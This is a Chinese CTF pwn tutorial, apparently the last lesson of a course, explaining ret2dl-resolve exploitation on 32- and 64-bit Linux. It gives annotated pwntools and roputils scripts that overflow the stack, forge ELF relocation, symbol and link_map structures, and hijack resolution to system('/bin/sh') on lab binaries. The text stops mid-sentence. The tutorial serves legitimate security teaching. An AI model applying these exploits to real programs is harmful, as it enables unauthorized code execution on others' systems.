Linux Pwn入門教程系列分享已到尾聲，本套課程是作者依據i春秋Pwn入門課程中的技術分類，并結合近幾年賽事中出現的題目和文章整理出一份相對完整的Linux Pwn教程。

教程僅針對i386/amd64下的Linux Pwn常見的Pwn手法，如棧，堆，整數溢出，格式化字符串，條件競爭等進行介紹，所有環境都會封裝在Docker鏡像當中，并提供調試用的教學程序，來自歷年賽事的原題和帶有注釋的python腳本。

今天i春秋與大家分享的是Linux Pwn入門教程中的最后一節內容：針對函數重定位流程的相關測試(下)，閱讀用時約20分鐘。

注：文末有本套課程所整理的全部內容，大家可收藏進行系統學習。

32位下的ret2dl-resolve

通過一系列冗長的源碼閱讀+調試分析，我們捋了一遍符號重定位的流程，現在我們要站在測試角度看待這個流程了。從上面的分析結果中我們知道其實最終影響解析的是函數的名字，那么如果我們強行把write改成system呢？我們來試一下。

我們強行修改內存數據，然后繼續運行，發現劫持got表成功，此時write表項是system的地址。

那么我們是不是可以修改dynstr里面的數據呢？通過查看內存屬性，我們很不幸地發現.rel.plt. .dynsym .dynstr所在的內存區域都不可寫。

這樣一來，我們能夠改變的就只有reloc_arg了。基于上面的分析，我們的思路是在內存中偽造Elf32_Rel和Elf32_Sym兩個結構體，并手動傳遞reloc_arg使其指向我們偽造的結構體，讓Elf32_Sym.st_name的偏移值指向預先放在內存中的字符串system完成攻擊。為了地址可控，我們首先進行棧劫持并跳轉到0x0804834B。

為此我們必須在bss段構造一個新的棧，以便棧劫持完成后程序不會崩潰。ROP鏈如下：

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(os = 'linux', arch = 'i386')

start_addr = 0x08048350
read_plt = 0x08048310
write_plt = 0x08048340
write_plt_without_push_reloc_arg = 0x0804834b
leave_ret = 0x08048482
pop3_ret = 0x08048519
pop_ebp_ret = 0x0804851b
new_stack_addr = 0x0804a200? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#bss與got表相鄰，_dl_fixup中會降低棧后傳參，設置離bss首地址遠一點防止參數寫入非法地址出錯

io = remote('172.17.0.2', 10001)

payload = ""
payload += 'A'*140? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#調用read函數往新棧寫值，防止leave; retn到新棧后出現ret到地址0上導致出錯
payload += p32(pop3_ret)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#read函數返回后從棧上彈出三個參數
payload += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#fd = 0
payload += p32(new_stack_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#buf = new_stack_addr
payload += p32(0x400)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#size = 0x400
payload += p32(pop_ebp_ret)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#把新棧頂給ebp，接下來利用leave指令把ebp的值賦給esp
payload += p32(new_stack_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(leave_ret)

io.send(payload)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#此時程序會停在我們使用payload調用的read函數處等待輸入數據

payload = ""
payload += "AAAA"? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#leave = mov esp, ebp; pop ebp，占位用于pop ebp
payload += p32(write_plt_without_push_reloc_arg)? ?? ???#按照我們的測試方案，強制程序對write函數重定位，reloc_arg由我們手動放入棧中
payload += p32(0x18)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #手動傳遞write的reloc_arg，調用write
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#函數執行完后返回start
payload += p32(1)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#fd = 1
payload += p32(0x08048000)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#buf = ELF程序加載開頭，write會輸出ELF
payload += p32(4)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#size = 4
io.send(payload)

測試結果：

我們可以看到調用成功了。我們發現其實跳轉到write_plt_without_push_reloc_arg上，還是會直接跳轉到PLT[0]，所以我們可以把這個地址改成PLT[0]的地址。

接下來我們開始著手在新的棧上偽造兩個結構體：

write_got = 0x0804a018? ?? ???
new_stack_addr = 0x0804a500? ?? ?? ?? ?? ?? ?? ?? ?#bss與got表相鄰，_dl_fixup中會降低棧后傳參，設置離bss首地址遠一點防止參數寫入非法地址出錯
relplt_addr = 0x080482b0? ?? ?? ?? ?? ?? ?? ?? ?#.rel.plt的首地址，通過計算首地址和新棧上我們偽造的結構體Elf32_Rel偏移構造reloc_arg
dymsym_addr = 0x080481cc? ?? ?? ?? ?? ?? ?? ?? ?#.dynsym的首地址，通過計算首地址和新棧上我們偽造的Elf32_Sym結構體偏移構造Elf32_Rel.r_info
dynstr_addr = 0x0804822c? ?? ?? ?? ?? ?? ?? ?? ?#.dynstr的首地址，通過計算首地址和新棧上我們偽造的函數名字符串system偏移構造Elf32_Sym.st_name

fake_Elf32_Rel_addr = new_stack_addr + 0x50? ?? ???#在新棧上選擇一塊空間放偽造的Elf32_Rel結構體，結構體大小為8字節
fake_Elf32_Sym_addr = new_stack_addr + 0x5c? ?? ???#在偽造的Elf32_Rel結構體后面接上偽造的Elf32_Sym結構體，結構體大小為0x10字節
binsh_addr = new_stack_addr + 0x74? ?? ?? ?? ?? ?? ?? ?? ?#把/bin/sh\x00字符串放在最后面

fake_reloc_arg = fake_Elf32_Rel_addr - relplt_addr? ?? ???#計算偽造的reloc_arg

fake_r_info = ((fake_Elf32_Sym_addr - dymsym_addr)/0x10) << 8 | 0x7 #偽造r_info，偏移要計算成下標，除以Elf32_Sym的大小，最后一字節為0x7

fake_st_name = new_stack_addr + 0x6c - dynstr_addr? ?? ?? ?? ?? ? #偽造的Elf32_Sym結構體后面接上偽造的函數名字符串system

fake_Elf32_Rel_data = ""
fake_Elf32_Rel_data += p32(write_got)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_offset = write_got，以免重定位完畢回填got表的時候出現非法內存訪問錯誤
fake_Elf32_Rel_data += p32(fake_r_info)

fake_Elf32_Sym_data = ""
fake_Elf32_Sym_data += p32(fake_st_name)
fake_Elf32_Sym_data += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#后面的數據直接套用write函數的Elf32_Sym結構體，具體成員變量含義自行搜索
fake_Elf32_Sym_data += p32(0)
fake_Elf32_Sym_data += p32(0x12)

我們把新棧的地址向后調整了一點，因為在調試深入到_dl_fixup的時候發現某行指令試圖對got表寫入，而got表正好就在bss的前面，緊接著bss，為了防止運行出錯，我們進行了調整。此外，需要注意的是偽造的兩個結構體都要與其首地址保持對齊。完成了結構體偽造之后，我們將這些內容放在新棧中，調試的時候確認整個偽造的鏈條正確，pwn it！

64位下的ret2dl-resolve

與32位不同，在64位下，雖然_dl_fixup函數的邏輯沒有改變，但是許多相關的變量和結構體都有了變化。例如在glibc/sysdeps/x86_64/dl-runtime.c中定義了reloc_offset和reloc_index：

#define reloc_offset reloc_arg * sizeof (PLTREL)
#define reloc_index??reloc_arg

#include

我們可以推斷出reloc_arg已經不像32位中是作為一個偏移值存在，而是作為一個數組下標存在。此外，兩個關鍵的結構體也做出了調整：Elf32_Rel升級為Elf64_Rela, Elf32_Sym升級為Elf64_Sym，這兩個結構體的大小均為0x18。

typedef struct
{
??Elf64_Addr? ?? ???r_offset;? ?? ?? ?? ?? ? /* Address */
??Elf64_Xword? ?? ???r_info;? ?? ?? ?? ?? ?? ?? ?? ?/* Relocation type and symbol index */
??Elf64_Sxword? ?? ???r_addend;? ?? ?? ?? ?? ? /* Addend */
} Elf64_Rela;

typedef struct
{
??Elf64_Word? ?? ???st_name;? ?? ?? ?? ?? ? /* Symbol name (string tbl index) */
??unsigned char? ?? ???st_info;? ?? ?? ?? ?? ? /* Symbol type and binding */
??unsigned char st_other;? ?? ?? ?? ?? ? /* Symbol visibility */
??Elf64_Section? ?? ???st_shndx;? ?? ?? ?? ?? ? /* Section index */
??Elf64_Addr? ?? ???st_value;? ?? ?? ?? ?? ? /* Symbol value */
??Elf64_Xword? ?? ???st_size;? ?? ?? ?? ?? ? /* Symbol size */
} Elf64_Sym;

此外，_dl_runtime_resolve的實現位于glibc/sysdeps/x86_64/dl-trampoline.h中，其代碼加了宏定義之后可讀性很差，核心內容仍然是調用_dl_fixup，此處不再分析。

最后，在64位下進行ret2dl-resolve還有一個問題，即我們在分析源碼時提到但是應用中卻忽略的一個潛在數組越界：

? ?? ?if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
? ?? ???{
? ?? ?? ? const ElfW(Half) *vernum =
? ?? ?? ?? ?(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
? ?? ?? ? ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
? ?? ?? ? version = &l->l_versions[ndx];
? ?? ?? ? if (version->hash == 0)
? ?? ?? ?? ?version = NULL;
? ?? ???}

這里會使用reloc->r_info的高位作為下標產生了ndx，然后在link_map的成員數組變量l_versions中取值作為version。為了在偽造的時候正確定位到sym，r_info必然會較大。在32位的情況下，由于程序的映射較為緊湊， reloc->r_info的高24位導致vernum數組越界的情況較少。

由于程序映射的原因，vernum數組首地址后面有大片內存都是以0x00填充，測試導致reloc->r_info的高24位過大后從vernum數組中獲取到的ndx有很大概率是0，從而由于ndx異常導致l_versions數組越界的幾率也較低。我們可以對照源碼，IDA調試進入_dl_fixup后，將斷點下在if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)附近。

中斷后切換到匯編

單步運行到movzx edx, word ptr [edx+esi*2]一行

觀察edx的值，此處為0x0804827c, edx+esi*2 = 0x08048284，查看程序的內存映射情況。

一直到地址0x0804b000都是可讀的，所以esi，也就是reloc->r_info的高24位最高可以達到0x16c2，考慮到.dymsym與.bss的間隔，這個允許范圍基本夠用。繼續往下看：

此時的edi = 0xf7fa9918，[edi+170h]保存的值為0Xf7f7eb08，其后連續可讀的地址最大值為0xf7faa000，因此mov ecx, [edx+4]一行，按照之前幾行匯編代碼的算法，只要取出的edx值不大于(0xf7faa000-0xf7f7eb08)/0x10 = 0x2b4f，version = &l->l_versions[ndx];就不會產生非法內存訪問。仔細觀察會發現0x0804827c~0x0804b000之間幾乎所有的2字節word型數據都符合要求。因此，大部分情況下32位的題目很少會產生ret2dl-resolve在此處造成的段錯誤。

而對于64位，我們用相同的方法調試本節的例子~/XMAN 2016-level3_64/level3_64會發現由于我們常用的bss段被映射到了0x600000之后，而dynsym的地址仍然在0x400000附近，r_info的高位將會變得很大，再加上此時vernum也在0x400000附近，vernum[ELFW(R_SYM) (reloc->r_info)]將會有很大概率落在在0x400000~0x600000間的不可讀區域。

從而產生一個段錯誤。為了防止出現這個錯誤，我們需要修改判斷流程，使得l->l_info[VERSYMIDX (DT_VERSYM)]為0，從而繞開這塊代碼。而l->l_info[VERSYMIDX (DT_VERSYM)]在64位中的位置就是link_map+0x1c8(對應的，32位下為link_map+0xe4)，所以我們需要泄露link_map地址并將link_map置為0。

64位下的ret2dl-resolve與32位下的ret2dl-resolve除了上述一些變化之外，exp構造流程并沒有什么區別，在此處不再贅述，詳細腳本可見于附件。

理論上來說，ret2dl-resolve對于所有存在棧溢出，沒有Full RELRO(如果開啟了Full RELRO，所有符號將會在運行時被全部解析，也就不存在_dl_fixup了)且有一個已知確定的棧地址(可以通過stack pivot劫持棧到已知地址)的程序都適用。但是我們從上面的64位ret2dl-resolve中可以看到其必須泄露link_map的地址才能完成利用，對于32位程序來說也可能出現同樣的問題。如果出現了不存在輸出的棧溢出程序，我們就沒辦法用這種套路了，那我們該怎么辦呢？接下來的幾節我們將介紹一些不依賴泄露的攻擊手段。

使用ROPutils簡化攻擊步驟

從上面32位和64位的攻擊腳本我們不難看出來，雖然構造payload的過程很繁瑣，但是實際上大部分代碼的格式都是固定的，我們完全可以把它們封裝成一個函數進行調用。當然，我們還可以當一把懶人，直接用別人寫好的庫。例如項目ROPutils(https://github.com/inaz2/roputils)

閱讀代碼roputils.py，其大部分我們會用到的東西都在ROP*和FormatStr這幾個類中，不過ROPutils也提供了其他的輔助工具類和函數。當然，在本節中我們只會介紹和ret2dl-resolve相關的一些函數的用法，不做源碼分析和過多的介紹。

我們可以直接把roputils.py和自己寫的腳本放在同一個文件夾下以使用其中的功能。以~/XMAN 2016-level3/level4為例。其實我們會發現fake dl-resolve并不一定需要進行棧劫持，我們只要確保偽造的link_map所在地址已知，且地址能被作為參數傳入_dl_fixup即可。我們先來構造一個棧溢出，調用read讀取偽造的link_map到.bss中。

from roputils import *
#為了防止命名沖突，這個腳本全部只使用roputils中的代碼。如果需要使用pwntools中的代碼需要在import roputils前import pwn，以使得roputils中的ROP覆蓋掉pwntools中的ROP

rop = ROP('./level4')? ?? ?? ?? ?? ?? ?? ?? ?#ROP繼承了ELF類，下面的section, got, plt都是調用父類的方法
bss_addr = rop.section('.bss')
read_got = rop.got('read')
read_plt = rop.plt('read')

offset = 140

io = Proc(host = '172.17.0.2', port = 10001)? ?? ???#roputils中這里需要顯式指定參數名

buf = rop.fill(offset)? ?? ?? ?? ?? ?? ?? ?? ?#fill用于生成填充數據
buf += rop.call(read_plt, 0, bss_addr, 0x100)? ?? ???#call可以通過某個函數的plt地址方便地進行調用
buf += rop.dl_resolve_call(bss_addr+0x20, bss_addr)? ?? ???#dl_resolve_call有一個參數base和一個可選參數列表*args。base為偽造的link_map所在地址，*args為要傳遞給被劫持調用的函數的參數。這里我們將"/bin/sh\x00"放置在bss_addr處，link_map放置在bss_addr+0x20處
io.write(buf)
然后我們直接用dl_resolve_data生成偽造的link_map并發送
buf = rop.string('/bin/sh')? ?? ?? ?? ?? ?
buf += rop.fill(0x20, buf)? ?? ?? ?? ?? ? #如果fill的第二個參數被指定，相當于將第二個參數命名的字符串填充至指定長度
buf += rop.dl_resolve_data(bss_addr+0x20, 'system')? ?? ???#dl_resolve_data的參數也非常簡單，第一個參數是偽造的link_map首地址，第二個參數是要偽造的函數名
buf += rop.fill(0x100, buf)
io.write(buf)

然后我們直接使用io.interact(0)就可以打開一個shell了。

關于roputils的用法可以參考其github倉庫中的examples，其他練習程序不再提供對應的roputils寫法的腳本。

在.dynamic節中偽造.dynstr節地址

在32位的ret2dl-resolve一節中我們已經發現,ELF開發小組為了安全，設置.rel.plt. .dynsym .dynstr三個重定位相關的節區均為不可寫。然而ELF文件中有一個.dynamic節，其中保存了動態鏈接器所需要的基本信息，而我們的.dynstr也屬于這些基本信息中的一個。

如果一個程序沒有開啟RELRO(即checksec顯示No RELRO).dynamic節是可寫的。(Partial RELRO和Full RELRO會在程序加載完成時設置.dynamic為不可寫，因此盡管readelf顯示其為可寫也不可相信)

.dynamic節中只包含Elf32/64_Dyn結構體類型的數據，這兩個結構體定義在glibc/elf/elf.h下：

typedef struct
{
??Elf32_Sword? ?? ???d_tag;? ?? ?? ?? ?? ?? ?? ?? ?/* Dynamic entry type */
??union
? ? {
? ?? ?Elf32_Word d_val;? ?? ?? ?? ?? ?? ?? ?? ?/* Integer value */
? ?? ?Elf32_Addr d_ptr;? ?? ?? ?? ?? ?? ?? ?? ?/* Address value */
? ? } d_un;
} Elf32_Dyn;

typedef struct
{
??Elf64_Sxword? ?? ???d_tag;? ?? ?? ?? ?? ?? ?? ?? ?/* Dynamic entry type */
??union
? ? {
? ?? ?Elf64_Xword d_val;? ?? ?? ?? ?? ? /* Integer value */
? ?? ?Elf64_Addr d_ptr;? ?? ?? ?? ?? ?? ?? ?? ?/* Address value */
? ? } d_un;
} Elf64_Dyn;

從結構體的定義我們可以看出其由一個d_tag和一個union類型組成，union中的兩個變量會隨著不同的d_tag進行切換，我們通過readelf看一下.dynstr的d_tag。

其標記為0x05，union變量顯示為值0x0804820c。我們看一下內存中.dynamic節中.dynstr對應的Elf32_Dyn結構體和指針指向的數據。

因此，我們只需要在棧溢出后程序中仍然存在至少一個未執行過的函數，我們就可以修改.dynstr對應結構體中的地址，從而使其指向我們偽造的.dynstr數據，進而在解析的時候解析出我們想要的函數。

我們以32位的程序為例，打開~/fake_dynstr32/fake_dynstr32。

這個程序滿足了我們需要的一切條件——No RELRO，棧溢出發生在vuln中，exit不會被調用，因此我們可以用上述方法進行攻擊。首先我們把所有的字符串從里面拿出來，并且把exit替換成system。

call_exit_addr = 0x08048495
read_plt = 0x08048300
start_addr = 0x08048350
dynstr_d_ptr_address = 0x080496a4
fake_dynstr_address = 0x08049800
fake_dynstr_data = "\x00libc.so.6\x00_IO_stdin_used\x00system\x00\x00\x00\x00\x00\x00read\x00__libc_start_main\x00__gmon_start__\x00GLIBC_2.0\x00"

注意由于memset的一部分也會被system覆蓋掉，我們應該把剩余的部分設置為\x00，防止后面的符號偏移值錯誤。memset由于是在read函數運行之前運行的，所以它的符號已經沒用了，可以被覆蓋掉。

接下來我們構造ROP鏈依次寫入偽造的dynstr字符串和其保存在Elf32_Dyn中的地址。

io = remote("172.17.0.2", 10001)

payload = ""
payload += 'A'*22? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#修改.dynstr對應的Elf32_Dyn.d_ptr
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
payload += p32(dynstr_d_ptr_address)? ?? ???
payload += p32(4)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
io.send(payload)
sleep(0.5)
io.send(p32(fake_dynstr_address))? ?? ?? ?? ?? ? #新的.dynstr地址
sleep(0.5)

payload = ""
payload += 'A'*22? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#在內存中偽造一塊.dynstr字符串
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(0)? ?? ?? ?? ?? ?
payload += p32(fake_dynstr_address)
payload += p32(len(fake_dynstr_data)+8)? ?? ???#長度是.dynstr加上8，把"/bin/sh\x00"接在后面
io.send(payload)
sleep(0.5)
io.send(fake_dynstr_data+"/bin/sh\x00")? ?? ???#把/bin/sh\x00接在后面
sleep(0.5)

此時還剩下函數exit未被調用，我們通過前面的步驟偽造了.dynstr，將其中的exit改成了system，因此根據_dl_fixup的原理，此時函數將會解析system的首地址并返回到system上。

64位下的利用方式與32位下并沒有區別，此處不再進行詳細分析。

fake link_map

由于各種保護方式的普及，現在能碰到No RELRO的程序已經很少了，因此上節所述的攻擊方式能用上的機會并不多，所以這節我們介紹另外一種方式——通過偽造link_map結構體進行攻擊。

在前面的源碼分析中，我們主要把目光集中在未解析過的函數在_dl_fixup的流程中而忽略了另外一個分支。

_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
? ?? ?? ???ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
? ?? ?? ???struct link_map *l, ElfW(Word) reloc_arg)
{
??………… //變量定義，初始化等等
??if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) //判斷函數是否被解析過。此前我們一直利用未解析過的函數的結構體，所以這里的if始終成立
? ?…………
? ?? ?result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?version, ELF_RTYPE_CLASS_PLT, flags, NULL);
…………
? ? }
??else
? ? {
? ?? ?/* We already found the symbol.??The module (and therefore its load
? ?? ?? ?address) is also known.??*/
? ?? ?value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
? ?? ?result = l;
? ? }
…………
}

通過注釋我們可以看到之前的if起的是判斷函數是否被解析過的作用，如果函數被解析過，_dl_fixup就不會調用_dl_lookup_symbol_x對函數進行重定位，而是直接通過宏DL_FIXUP_MAKE_VALUE計算出結果。這邊用到了link_map的成員變量l_addr和Elf32/64_Sym的成員變量st_value。這里的l_addr是實際映射地址和原來指定的映射地址的差值，st_value根據對應節的索引值有不同的含義。

不過在這里我們并不需要關心那么多，我們只需要知道如果我們能使l->l_addr + sym->st_value指向一個函數的在內存中的實際地址，那么我們就能返回到這個函數上。但是問題來了，如果我們知道了system在內存中的實際地址，我們何苦用那么麻煩的方式跳轉到system上呢？所以答案是我們不知道。

我們需要做的是讓l->l_addr和sym->st_value其中之一落在got表的某個已解析的函數上(如__libc_start_main)，而另一個則設置為system函數和這個函數的偏移值。既然我們都偽造了link_map，那么顯然l_addr是我們可以控制的，而sym根據我們的源碼分析，它的值最終也是從link_map中獲得的(很多節區地址，包括.rel.plt, .dynsym, dynstr都是從中取值，更多細節可以對比調試時的link_map數據與源碼進行學習)

const ElfW(Sym) *const symtab= (const void *) D_PTR (l, l_info[DT_SYMTAB]);
??const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);

??const PLTREL *const reloc
? ? = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
??const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];

所以這兩個值我們都可以進行偽造。此時只要我們知道libc的版本，就能算出system與已解析函數之間的偏移了。

說到這里可能有人會想到，既然偽造的link_map那么厲害，那么我們為什么不在前面的dl-resolve中直接偽造出.dynstr的地址，而要通過一條冗長的求值鏈返回到system呢？我們來看一下上面的這行代碼：

? ?? ?result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?version, ELF_RTYPE_CLASS_PLT, flags, NULL);

根據位于glibc/include/Link.h中的link_map結構體定義，這里的l_scope是一個當前link_map的查找范圍數組。我們從link_map結構體的定義可以看出來其實這是一個雙鏈表，每一個link_map元素都保存了一個函數庫的信息。當查找某個符號的時候，實際上是通過遍歷整個雙鏈表，在每個函數庫中進行的查詢。顯然，我們不可能知道libc的link_map地址，所以我們沒辦法偽造l_scope，也就沒辦法偽造整個link_map使流程進入_dl_lookup_symbol_x，只能選擇讓流程進入“函數已被解析過”的分支。

回到主題，我們為了讓函數流程繞過_dl_lookup_symbol_x，必須偽造sym使得ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0，根據sym的定義，我們就得偽造symtab和reloc->r_info，所以我們得偽造DT_SYMTAB, DT_JMPREL，此外，我們得偽造strtab為可讀地址，所以還得偽造DT_STRTAB，所以我們需要偽造link_map前0xf8個字節的數據，需要關注的分別是位于link_map+0的l_addr，位于link_map+0x68的DT_STRTAB指針，位于link_map+0x70的DT_SYMTAB指針和位于link_map+0xF8的DT_JMPREL指針。

此外，我們需要偽造Elf64_Sym結構體，Elf64_Rela結構體，由于DT_JMPREL指向的是Elf64_Dyn結構體，我們也需要偽造一個這樣的結構體。當然，我們得讓reloc_offset為0.為了偽造的方便，我們可以選擇讓l->l_addr為已解析函數內存地址和system的偏移，sym->st_value為已解析的函數地址的指針-8，即其got表項-8。(這部分在源碼中似乎并沒有體現出來，但是調試的時候發現實際上會+8，原因不明)我們還是以~/XMAN 2016-level3_64/level3_64為例進行分析。

首先我們來構造一個fake link_map：

fake_link_map_data = ""
fake_link_map_data += p64(offset)? ?? ?? ?? ?? ?? ?? ?? ?# +0x00 l_addr offset = system - __libc_start_main
fake_link_map_data += '\x00'*0x60
fake_link_map_data += p64(DT_STRTAB)? ?? ?? ?? ?? ? #+0x68 DT_STRTAB
fake_link_map_data += p64(DT_SYMTAB)? ?? ?? ?? ?? ? #+0x70 DT_SYMTAB
fake_link_map_data += '\x00'*0x80
fake_link_map_data += p64(DT_JMPREL)? ?? ?? ?? ?? ? #+0xf8 DT_JMPREL
后面的link_map數據由于我們用不上就不構造了。根據我們的分析，我們留出來四個8字節數據區用來填充相應的數據，其他部分都置為0.
接下來我們偽造出三個結構體
fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#d_tag
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#d_ptr

fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#r_offset
fake_Elf64_Rela += p64(7)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#r_info
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#r_addend

fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_name
fake_Elf64_Sym += 'AAAA'? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#st_info, st_other, st_shndx
fake_Elf64_Sym += p64(main_got-8)? ?? ?? ?#st_value
fake_Elf64_Sym += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_size

顯然我們必須把r_info設置為7以通過檢查。為了使ELFW(ST_VISIBILITY) (sym->st_other)不為0從而躲過_dl_lookup_symbol_x，我們直接把st_other設置為非0.st_other也必須為非0以避開_dl_lookup_symbol_x，進入我們希望要的分支。

我們注意到fake_link_map中間有許多用\x00填充的空間，這些地方實際上寫啥都不影響我們的攻擊，因此我們充分利用空間，把三個結構體跟/bin/sh\x00也塞進去。

offset = 0x253a0 #system - __libc_start_main

fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #d_tag? ?? ?? ?? ?? ? 從link_map中找.rel.plt不需要用到標簽， 隨意設置
fake_Elf64_Dyn += p64(fake_link_map_addr + 0x18)? ?? ?? ?? ?? ? #d_ptr? ?? ?? ?? ?? ? 指向偽造的Elf64_Rela結構體，由于reloc_offset也被控制為0，不需要偽造多個結構體

fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(fake_link_map_addr - offset)? ?? ?? ?? ?? ? #r_offset? ?? ???rel_addr = l->addr+reloc_offset，直接指向fake_link_map所在位置令其可讀寫就行
fake_Elf64_Rela += p64(7)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_info? ?? ?? ?? ?? ? index設置為0，最后一字節必須為7
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_addend? ?? ???隨意設置

fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_name? ?? ???隨意設置
fake_Elf64_Sym += 'AAAA'? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_info, st_other, st_shndx st_other非0以避免進入重定位符號的分支
fake_Elf64_Sym += p64(main_got-8)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_value? ?? ???已解析函數的got表地址-8，-8體現在匯編代碼中，原因不明
fake_Elf64_Sym += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #st_size? ?? ???隨意設置

fake_link_map_data = ""
fake_link_map_data += p64(offset)? ?? ?? ?? ?? ?? ?? ?? ?#l_addr，偽造為兩個函數的地址偏移值
fake_link_map_data += fake_Elf64_Dyn
fake_link_map_data += fake_Elf64_Rela
fake_link_map_data += fake_Elf64_Sym
fake_link_map_data += '\x00'*0x20
fake_link_map_data += p64(fake_link_map_addr)? ?? ?? ?? ?? ? #DT_STRTAB? ?? ???設置為一個可讀的地址
fake_link_map_data += p64(fake_link_map_addr + 0x30)#DT_SYMTAB? ?? ???指向對應結構體數組的地址
fake_link_map_data += "/bin/sh\x00"? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
fake_link_map_data += '\x00'*0x78
fake_link_map_data += p64(fake_link_map_addr + 0x8)? ?? ???#DT_JMPREL? ?? ???指向對應數組結構體的地址

現在我們需要做的就是棧劫持，偽造參數跳轉到_dl_fixup了。前兩者好說，_dl_fixup地址也在got表中的第2項。但是問題是這是一個保存了函數地址的地址，我們沒辦法放在棧上用ret跳過去，難道要再用一次萬能gadgets嗎？不，我們可以選擇這個：

